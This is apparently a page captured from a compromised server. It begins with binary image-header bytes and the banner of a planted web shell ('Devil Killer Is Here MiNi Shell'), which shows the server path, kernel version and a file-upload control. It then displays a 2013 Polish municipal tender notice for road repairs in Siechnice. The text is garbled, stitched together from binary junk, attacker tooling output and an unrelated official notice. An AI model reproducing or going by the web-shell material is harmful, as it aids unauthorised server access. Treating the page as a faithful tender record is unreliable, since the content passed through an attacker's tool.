JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130426/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130426/168654-N-2013.html

<p class="kh_header"><b>Siechnice: Remonty bieżące, cząstkowe i wykonanie nawierzchni dróg bitumicznych i z destruktu bitumicznego na terenie Gminy Siechnice</b><br>
<b>Numer ogłoszenia: 168654 - 2013; data zamieszczenia: 26.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Siechnic , ul. Jana Pawła II 12, 55-011 Siechnice, woj. dolnośląskie, tel. 71 391 91 01, faks 71 786 09 07.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siechnice.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty bieżące, cząstkowe i wykonanie nawierzchni dróg bitumicznych i z destruktu bitumicznego na terenie Gminy Siechnice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest
realizacja zadania pn.: Remonty bieżące, cząstkowe i wykonanie nawierzchni dróg bitumicznych i z
destruktu bitumicznego na terenie Gminy Siechnice. Prace na drogach będą przebiegać zgodnie z
bieżącymi zleceniami. Załącznik nr 10 do specyfikacji istotnych warunków zamówienia zawiera przybliżony
zakres prac. Przedmiot zamówienia obejmuje w szczególności zakres szczegółowo opisany w załączniku
nr 2 do specyfikacji istotnych warunków zamówienia. Zamawiający zastrzega sobie prawo zmniejszenia
(ograniczenia) lub zwiększenia zakresu zadania w zależności od bieżących potrzeb oraz w zależności od
posiadanych środków finansowych. Zamawiający nie dopuszcza składania ofert częściowych. Oferty nie
zawierające pełnego zakresu przedmiotu zamówienia zostaną odrzucone.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w zakresie analogicznym do zakresu
będącego przedmiotem zamowienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium
w wysokości 10.000,00 zł (słownie: dziesięć tysięcy złotych), najpóźniej do dnia składania ofert do godz.
11:30. Wadium powinno być wniesione w: 1) pieniądzu, 2) poręczeniach bankowych lub poręczeniach
spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem
pieniężnym; 3) gwarancji bankowej, 4) gwarancji ubezpieczeniowej lub 5) poręczeniach udzielanych przez
podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej
Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późniejszymi zmianami). Jeżeli wadium
składane będzie w pieniądzu należy je przelać na konto Zamawiającego: Bank Spółdzielczy w Oleśnicy
oddział Święta Katarzyna nr 78 9584 1092 2010 1000 0101 0008 z dopiskiem: Remonty bieżące,
cząstkowe i wykonanie nawierzchni dróg bitumicznych i z destruktu bitumicznego na terenie Gminy
Siechnice - w terminie zapewniającym jego wpływ na ww konto do czasu złożenia ofert. Dowód wpłaty
wadium (potwierdzoną kserokopię) należy dołączyć do oferty. W przypadku wnoszenia wadium w innych
środkach (gwarancje bankowe lub ubezpieczeniowe), należy je złożyć do depozytu znajdującego się w
kasie Urzędu pok. nr 112, w godz. 8:00 - 13:00 w terminie do dnia składania ofert do godz. 11:30. Oferty
bez wniesionego wadium przetargowego będą traktowane jako nie spełniające wymagań przetargu i na tej
podstawie zostaną odrzucone, bez dalszego rozpatrywania. 2. Zwrot wadium przetargowego wykonawcom
nastąpi zgodnie z art. 46 ustawy Prawo zamówień publicznych (tj Dz. U. Nr 113 poz. 759 z 2010 r. z
późniejszymi zmianami). 3. Sytuacje skutkujące zatrzymanie wadium: 1) w odpowiedzi na wezwanie, o
którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, wykonawca nie złożył dokumentów lub
oświadczeń, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie; 2) odmówił
podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 3) zawarcie
umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy. 4. Zamawiający zwraca wadium
wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu
postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z
zastrzeżeniem pkt. 8.7. 5. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający
zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu
zabezpieczenia należytego wykonania umowy, jeśli jego wniesienia zażądano w niniejszej SIWZ. 6.
Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem
terminu składania ofert. 7. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu
zwrócono wadium na podstawie pkt. 8.4 jeżeli w wyniku ostatecznego rozstrzygnięcia protestu jego oferta
została wybrana jako najkorzystniejsza.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca: 1) posiada uprawnienia do wykonywania
określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
2) wraz z ofertą złoży podpisane oświadczenia o spełnieniu warunków w niniejszym
postępowaniu zgodnie z wzorem zamieszczonym w załączniku nr 3 do specyfikacji istotnych
warunków zamówienia - Oświadczenie o spełnieniu warunków udziału w postępowaniu. W
przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie
zamówienia, wymagane oświadczenie musi być złożone przez każdego wykonawcę</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca wraz z ofertą złoży podpisany wykaz wykonanych
w okresie pięciu lat przed upływem terminu składania ofert - a jeżeli okres prowadzenia
działalności jest krótszy - w tym okresie, robót budowlanych. W wykazie wykonawca
zobowiązany jest do podania rodzaju, wartości, dat i miejsca wykonania wykazanych robót
budowlanych oraz załączy dowody dotyczące najważniejszych robót określających, czy te roboty
zostały wykonane w sposób należyty, a także wskazujące, że zostały wykonane zgodnie z
zasadami sztuki budowlanej i prawidłowo ukończone. Wzór wykazu stanowi załącznik nr 7 do
specyfikacji istotnych warunków zamówienia (Wykaz wykonanych/wykonywanych w ciągu
ostatnich pięciu lat robót budowlanych). Dowodami, o których mowa powyżej są: 1)
poświadczenie lub 2) inne dokumenty wykonawcy jeżeli z uzasadnionych przyczyn o
obiektywnym charakterze wykonawca nie jest w stanie uzyskać stosownego poświadczenia. W
tym przypadku Wykonawca zobowiązany jest do podania przyczyny niemożności złożenia
poświadczenia, o którym mowa w pkt. 1, lub 3) dokumenty potwierdzające należyte wykonanie
robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie,
określone w § 1 ust. 1 pkt 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w
sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawców oraz form, w
jakich te dokumenty mogą być składane (Dz.U. nr 226, poz 1817). W przypadku, gdy zamawiający jest podmiotem na rzecz którego roboty budowlane wskazane w wykazie zostały
wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w
punktach 1, 2 i 3 powyżej. W szczególności w celu zweryfikowania rzetelności, kwalifikacji,
efektywności i doświadczenia Wykonawca zobowiązany jest w wykazie, o którym mowa powyżej,
wskazać roboty budowlane, których zakres jest zgodny z robotami budowlanymi stanowiącymi
przedmiot zamówienia, a także dołączyć poświadczenia lub dowody, o których mowa w pkt 1 i 3
powyżej, tj. wskazać co najmniej trzy roboty budowlane spośród robót budowlanych
polegających na: 1) remoncie cząstkowym nawierzchni bitumicznych o łącznej powierzchni
2.000,00 m2, 2) ułożenia nawierzchni z betonu asfaltowego na pow. 2 500,00 m2, 3) naprawy
nawierzchni bitumicznej za pomocą remontera PATCHER (lub podobnego typu) na pow. 1
000,00 m2, 4) frezowania nawierzchni bitumicznej o pow. 1 500,00 m2. Wykonawca
zobowiązany jest do wskazania w ww. wykazie robót budowlanych niewykonanych lub
wykonanych nienależycie. W przypadku składania oferty przez wykonawców ubiegających się
wspólnie o udzielenie zamówienia, wymagane informacje mogą być złożone wspólnie lub
oddzielnie przez wykonawców. Zgodnie z art.26 ust.2b PZP, Wykonawca może polegać na
wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z
nimi stosunków. Jeżeli wykonawca wskazując na spełnienie warunków, o których mowa powyżej,
polega na zasobach innych podmiotów zamawiający w celu oceny, czy wykonawca będzie
dysponował wskazanymi zasobami w stopniu niezbędnym dla należytego wykonania zamówienia
oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp
do ich zasobów, żąda złożenia dokumentów dotyczących: 1) zakresu dostępnych wykonawcy
zasobów innego podmiotu, 2) sposobu wykorzystania zasobów innego podmiotu przez
wykonawcę przy realizacji zamówienia, 3) charakteru stosunku, jaki będzie łączył wykonawcę z
innym podmiotem, 4) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca: 1) wykaże, że dysponuje lub będzie dysponować
w okresie przewidzianym na realizację zamówienia sprzętem niezbędnym do realizacji
pojedynczego zadania (w przypadku złożenia oferty przez wykonawcę na dwa zadania
wykonawca musi wykazać spełnienie warunku oddzielnie dla każdego zadania z osobna), tj.: a)
Koparko-ładowarka - 1 sztuka, b) samochód skrzyniowy wraz z HDS - 1 sztuka, c) samochód
samowyładowczy dmc 8t - 2 sztuki, d) Samochód z termosem do mieszanki asfaltowej dmc 8t - 2
sztuki, e) Walec statyczny samojezdny 10 t - 1 sztuka, f) Walec samojezdny ogumiony 10 t - 1
sztuka, g) Rozkładarka mieszanek asfaltowych - 1 sztuka, h) Remonter typu PATCHER - 1
sztuka, i) Sprężarka - 1 sztuka, j) Piła do asfaltu - 1 sztuka, k) Skrapiarka do przewożenia bitumu
z ręczną pompą 250-300 dm3 - 1 sztuka, l) Frezarka - 1 sztuka, m) Sprzęt do wypełnienia spoin - 1 sztuka, 2) wraz z ofertą złoży podpisany wykaz narzędzi, wyposażenia zakładu i urządzeń
technicznych dostępnych wykonawcy robót budowlanych w celu wykonania zamówienia wraz z
informacją o podstawie dysponowania tymi zasobami, opracowany zgodnie z załączonym
wzorem stanowiącym załącznik nr 9 do specyfikacji istotnych warunków zamówienia - Wykaz
urządzeń technicznych dostępnych wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca: 1) wykaże, że dysponuje lub będzie dysponować
w okresie przewidzianym na realizację zamówienia osobami, które będą uczestniczyć w
wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych,
doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu
wykonywanych przez nie czynności, oraz informacją o podstawie dysponowania tymi osobami, w
szczególności osobami posiadającymi uprawnienia w rozumieniu ustawy Prawo budowlane z
dnia 7 lipca 1994 roku (tekst jednolity Dz. U. z 2006 r., Nr 156, poz. 1118 z późn. zm.) oraz
ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów
budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5 poz. 42 z późn. zm.) lub odpowiadające im
ważne uprawnienia budowlane w zakresie pełnionej funkcji które zostały wydane na podstawie
wcześniej obowiązujących przepisów, tj. kierownikiem robót posiadającym uprawnienia do
kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń, 2) wraz z ofertą
złoży podpisany wykaz osób, które będą uczestniczyć w realizacji zamówienia, zawierający
informację na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia zgodnie z
wymaganiami określonymi w pkt. 1, opracowany zgodnie z załączonym wzorem stanowiącym
załącznik nr 8 do specyfikacji istotnych warunków zamówienia - Wykaz personelu
odpowiedzialnego bezpośrednio za realizację zamówienia. 3) do oferty dołączy: a) informację o
podstawie do dysponowania osobą lub osobami, o których mowa w pkt. 1, b) zobowiązanie
osoby lub osób z uprawnieniami, że będą uczestniczyć w wykonywaniu zamówienia, c)
oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają
wymagane uprawnienia, jeżeli ustawy nakładają obowiązek ich posiadania. UWAGA: Najpóźniej
w dniu podpisania umowy, Wykonawca którego oferta została wybrana, będzie zobowiązany
dostarczyć wszystkie niezbędne uprawnienia i aktualne zaświadczenia o przynależności do izby
inżynierów budownictwa, potrzebne do realizacji zadania zgodnie z przepisami. Zamawiający
odstąpi od podpisania Umowy, jeżeli Wykonawca najpóźniej w dniu podpisania umowy, nie
dostarczy wszystkich niezbędnych dokumentów, potrzebnych do realizacji zadania zgodnie z
przepisami. W przypadku składania oferty przez wykonawców ubiegających się wspólnie o
udzielenie zamówienia, wymagane informacje mogą być złożone wspólnie lub oddzielnie przez
wykonawców. Zgodnie z art.26 ust.2b PZP, Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi
stosunków. Jeżeli wykonawca wskazując na spełnienie warunków, o których mowa w pkt. 1,
polega na zasobach innych podmiotów zamawiający w celu oceny, czy wykonawca będzie
dysponował wskazanymi zasobami w stopniu niezbędnym dla należytego wykonania zamówienia
oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp
do ich zasobów, żąda złożenia dokumentów dotyczących: 1) zakresu dostępnych wykonawcy
zasobów innego podmiotu, 2) sposobu wykorzystania zasobów innego podmiotu przez
wykonawcę przy realizacji zamówienia, 3) charakteru stosunku, jaki będzie łączył wykonawcę z
innym podmiotem, 4) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca posiada ubezpieczenie prowadzonej działalności
gospodarczej w zakresie będącym przedmiotem zamówienia lub wraz z ofertą złoży
oświadczenie, o tym, że w przypadku wyboru przez Zamawiającego oferty Wykonawcy, przed
podpisaniem umowy Wykonawca zobowiązuje się do przedłożenia Zamawiającemu dowodu
posiadania ubezpieczenie prowadzonej działalności gospodarczej w zakresie będącym
przedmiotem zamówienia, przez okres co najmniej od daty podpisania umowy do czasu odbioru
końcowego. Ubezpieczenie musi obejmować, co najmniej ubezpieczenie w pełnym zakresie od
odpowiedzialności cywilnej w związku z realizacją niniejszej umowy w wysokości co najmniej
100.000,00 zł. Zgodnie z art.26 ust.2b ustawy Pzp, jeżeli Wykonawca w celu spełnienia warunku,
o którym mowa powyżej, polega na zasobach innych podmiotów, niezależnie od charakteru
prawnego łączących go z nimi stosunków, zamawiający w celu oceny, czy wykonawca będzie
dysponował wskazanymi zasobami w stopniu niezbędnym dla należytego wykonania zamówienia
oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp
do ich zasobów, żąda przedstawienia dowodu posiadania aktualnej opłaconej polisy
ubezpieczeniowej lub innego dokumentu potwierdzającego posiadanie aktualnego ubezpieczenia
przez podmiot, z którego zasobów wykonawca korzysta</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca zobowiązany jest w wykazie, o którym mowa powyżej, wskazać roboty budowlane,
których zakres jest zgodny z robotami budowlanymi stanowiącymi przedmiot zamówienia, a także
dołączyć poświadczenia lub dowody, o których mowa w pkt 1 i 3 w części III.3.2) Wiedza i
doświadczenie, tj. wskazać co najmniej trzy roboty budowlane spośród robót budowlanych
polegających na: 1) remoncie cząstkowym nawierzchni bitumicznych o łącznej powierzchni
2.000,00 m2, 2) ułożenia nawierzchni z betonu asfaltowego na pow. 2 500,00 m2, 3) naprawy
nawierzchni bitumicznej za pomocą remontera PATCHER (lub podobnego typu) na pow. 1 000,00
m2, 4) frezowania nawierzchni bitumicznej o pow. 1 500,00 m2. Wykonawca zobowiązany jest do
wskazania w ww. wykazie robót budowlanych niewykonanych lub wykonanych nienależycie. W
przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia,
wymagane informacje mogą być złożone wspólnie lub oddzielnie przez wykonawców. Zgodnie z
art.26 ust.2b PZP, Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów,
niezależnie od charakteru prawnego łączących go z nimi stosunków. Jeżeli wykonawca wskazując
na spełnienie warunków, o których mowa powyżej, polega na zasobach innych podmiotów
zamawiający w celu oceny, czy wykonawca będzie dysponował wskazanymi zasobami w stopniu
niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z
tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda złożenia dokumentów
dotyczących: 1) zakresu dostępnych wykonawcy zasobów innego podmiotu, 2) sposobu
wykorzystania zasobów innego podmiotu przez wykonawcę przy realizacji zamówienia, 3)
charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, 4) zakresu i okresu udziału
innego podmiotu przy wykonywaniu zamówienia.;;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
